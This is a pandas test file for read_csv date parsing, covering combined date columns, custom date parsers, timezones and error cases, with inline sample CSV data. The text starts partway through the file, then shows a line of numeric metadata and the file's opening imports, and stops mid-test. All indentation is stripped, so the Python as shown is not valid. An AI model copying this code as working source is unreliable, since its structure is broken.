"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, prefix="X",
parse_dates=[1], index_col=1)
index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
datetime(1999, 1, 27, 22, 0)], name="X1")
expected = DataFrame([
["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900")
parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
date_parser=conv.parse_date_time,
parse_dates=parse_dates, prefix="X")
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59],
], columns=["actual", "nominal", "X0", "X4"])
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_multiple_date_col_timestamp_parse(all_parsers):
parser = all_parsers
data = """05/31/2012,15:30:00.029,1306.25,1,E,0,,1306.25
05/31/2012,15:30:00.029,1306.25,8,E,0,,1306.25"""
result = parser.read_csv(StringIO(data), parse_dates=[[0, 1]],
header=None, date_parser=Timestamp)
expected = DataFrame([
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 1, "E", 0, np.nan, 1306.25],
[Timestamp("05/31/2012, 15:30:00.029"),
1306.25, 8, "E", 0, np.nan, 1306.25]
], columns=["0_1", 2, 3, 4, 5, 6, 7])
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_with_header(all_parsers):
parser = all_parsers
data = """\
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000"""
result = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]})
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
"in dict date_NominalTime")),
("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
parser = all_parsers
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
# see gh-3071
parser = all_parsers
data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
"accountid,userid,contactid,level,silo,method\n"
"1343103150,0.062353,0,4,6,0.01690,3,"
"12345,1,-1,3,invoice_InvoiceResource,search\n")
result = parser.read_csv(
StringIO(data), index_col=0, parse_dates=[0],
date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
3, "invoice_InvoiceResource", "search"]],
columns=["elapsed", "sys", "user", "queries",
"query_time", "rows", "accountid",
"userid", "contactid", "level",
"silo", "method"],
index=Index([Timestamp("2012-07-24 04:12:30")],
name="posix_timestamp"))
tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
# see gh-3062
parser = all_parsers
df = DataFrame(dict({"A": np.asarray(lrange(10), dtype="float64"),
"B": pd.Timestamp("20010101")}))
df.iloc[3:6, :] = np.nan
with tm.ensure_clean("__nat_parse_.csv") as path:
df.to_csv(path)
result = parser.read_csv(path, index_col=0, parse_dates=["B"])
tm.assert_frame_equal(result, df)
def test_csv_custom_parser(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(
StringIO(data),
date_parser=lambda x: datetime.strptime(x, "%Y%m%d"))
expected = parser.read_csv(StringIO(data), parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=True)
expected = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col="date",
parse_dates=["date"])
index = date_range("1/1/2009", periods=3)
index.name = "date"
expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
"C": [2, 4, 5]}, index=index)
tm.assert_frame_equal(result, expected)
# Bug in https://github.com/dateutil/dateutil/issues/217
# has been addressed, but we just don't pass in the `yearfirst`
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
[["date", "time"]],
[[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=parse_dates)
index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
datetime(2009, 2, 28, 10, 20, 0),
datetime(2009, 3, 31, 8, 30, 0)],
dtype=object, name="date_time")
expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
data = "a,b,c\n01/01/2010,1,15/02/2010"
parser = all_parsers
expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
"c": [datetime(2010, 2, 15)]})
expected = expected.set_index(["a", "b"])
result = parser.read_csv(StringIO(data), index_col=[0, 1],
parse_dates=parse_dates, dayfirst=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
parser = all_parsers
index = MultiIndex.from_product([
(datetime(2009, 1, 1), datetime(2009, 1, 2),
datetime(2009, 1, 3)), ("one", "two", "three")],
names=["index1", "index2"])
# Out of order.
if index_col == [1, 0]:
index = index.swaplevel(0, 1)
expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
columns=["A", "B", "C"], index=index)
result = parser.read_csv(StringIO(data), index_col=index_col,
parse_dates=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
parser = all_parsers
data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
if "dayfirst" in kwargs:
df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
header=0, index_col=0, parse_dates=True,
na_values=["NA"])
exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
datetime(2010, 2, 2)], name="time")
expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
index=exp_index, columns=["Q", "NTU"])
tm.assert_frame_equal(df, expected)
else:
msg = "got an unexpected keyword argument 'day_first'"
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
date_parser=lambda d: parse_date(d, **kwargs),
skiprows=[0], index_col=0, parse_dates=True,
na_values=["NA"])
def test_parse_tz_aware(all_parsers):
# See gh-1693
parser = all_parsers
data = "Date,x\n2012-06-13T01:39:00Z,0.5"
result = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
expected = DataFrame({"x": [0.5]}, index=Index([Timestamp(
"2012-06-13 01:39:00+00:00")], name="Date"))
tm.assert_frame_equal(result, expected)
assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
({"nominal": [1, 2]}, "nominal"),
({"nominal": [1, 2]}, 0),
([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
parser = all_parsers
data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "ActualTime", "TDew",
"TAir", "Windspeed", "Precip", "WindDir"])
expected = expected.set_index("nominal")
if not isinstance(parse_dates, dict):
expected.index.name = "date_NominalTime"
result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
index_col=index_col)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
expected = expected.set_index("nominal")
reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
index_col="nominal", chunksize=2)
chunks = list(reader)
tm.assert_frame_equal(chunks[0], expected[:2])
tm.assert_frame_equal(chunks[1], expected[2:4])
tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
with_indices = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]},
index_col="nominal")
with_names = parser.read_csv(StringIO(data), index_col="nominal",
parse_dates={"nominal": [
"date", "nominalTime"]})
tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
parser = all_parsers
data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
parse_dates={"nominal": [1, 2]})
expected = parser.read_csv(StringIO(data),
parse_dates={"nominal": [1, 2]})
expected = expected.set_index(["nominal", "ID"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
# see gh-5636
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
(1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates=(1,))
def test_parse_dates_empty_string(all_parsers):
# see gh-2263
parser = all_parsers
data = "Date,test\n2012-01-01,1\n,2"
result = parser.read_csv(StringIO(data), parse_dates=["Date"],
na_filter=False)
expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
columns=["Date", "test"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("a\n04.15.2016", dict(parse_dates=["a"]),
DataFrame([datetime(2016, 4, 15)], columns=["a"])),
("a\n04.15.2016", dict(parse_dates=True, index_col=0),
DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
columns=["a", "b"])),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
DataFrame(index=MultiIndex.from_tuples(
[(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
# see gh-14066
parser = all_parsers
result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=[0, 1],
parse_dates={"date_time": [0, 1]},
date_parser=conv.parse_date_time)
expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
[datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
expected = DataFrame(expected_data,
columns=["date_time", ("A", "a"), ("B", "b")])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
[datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
columns=["date_time", "a", "b"])),
(("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", -0.99],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
parser = all_parsers
result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
**kwargs)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
parser = all_parsers
data = ("year,month,day,a\n2001,01,10,10.\n"
"2001,02,1,11.")
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ymd": [0, 1, 2]},
date_parser=conv.parse_date_fields)
expected = DataFrame([[datetime(2001, 1, 10), 10.],
[datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
parser = all_parsers
data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
result = parser.read_csv(StringIO(data), header=0,
date_parser=conv.parse_all_fields,
parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
microsecond=123456), 0.0, 10.0],
[datetime(2001, 1, 5, 10, 0, 0,
microsecond=500000), 1.0, 11.0]],
columns=["ymdHMS", "a", "b"])
tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
parser = all_parsers
data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."
result = parser.read_csv(StringIO(data), header=0,
parse_dates={"ym": [0, 1]},
date_parser=lambda y, m: date(year=int(y),
month=int(m),
day=1))
expected = DataFrame([[date(2001, 1, 1), 10, 10.],
[date(2001, 2, 1), 1, 11.]],
columns=["ym", "day", "a"])
tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
# see gh-10245
parser = all_parsers
data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
def date_parser(dt, time):
return np_array_datetime64_compat(dt + "T" + time + "Z",
dtype="datetime64[s]")
result = parser.read_csv(StringIO(data), date_parser=date_parser,
parse_dates={"datetime": ["date", "time"]},
index_col=["datetime", "prn"])
datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
dtype="datetime64[s]")
expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
index=MultiIndex.from_tuples(
[(datetimes[0], 126), (datetimes[1], 23),
(datetimes[2], 13)], names=["datetime", "prn"]))
tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
# see gh-6428
parser = all_parsers
data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
expected_data = [[7, "10/18/2006"],
[7, "10/18/2008"],
[621, " "]]
expected = DataFrame(expected_data, columns=["case", "opdate"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
("a\n135217135789158401\n1352171357E+5",
DataFrame({"a": [135217135789158401,
135217135700000]}, dtype="float64")),
("a\n99999999999\n123456789012345\n1234E+0",
DataFrame({"a": [99999999999,
123456789012345,
1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
# see gh-2697
#
# Date parsing should fail, so we leave the data untouched
# (i.e. float precision should remain unchanged).
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
# see gh-22256
parser = all_parsers
data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
result = parser.read_csv(StringIO(data), parse_dates=["dt"])
dti = pd.date_range(start="2018-01-04 09:01:00",
end="2018-01-04 09:05:00", freq="1min",
tz=pytz.FixedOffset(540))
expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
expected = DataFrame(expected_data)
tm.assert_frame_equal(result, expected)
| 40.189189
| 79
| 0.570597
|
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
parser = all_parsers
data = "06-02-2013;13:00;1-000.215"
expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
columns=["Date", 2])
df = parser.read_csv(StringIO(data), sep=";", thousands="-",
parse_dates={"Date": [0, 1]}, header=None)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
def date_parser(*date_cols):
return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
result = parser.read_csv(StringIO(data), header=None,
date_parser=date_parser, prefix="X",
parse_dates={"actual": [1, 2],
"nominal": [1, 3]},
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["actual", "nominal", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
data = """\
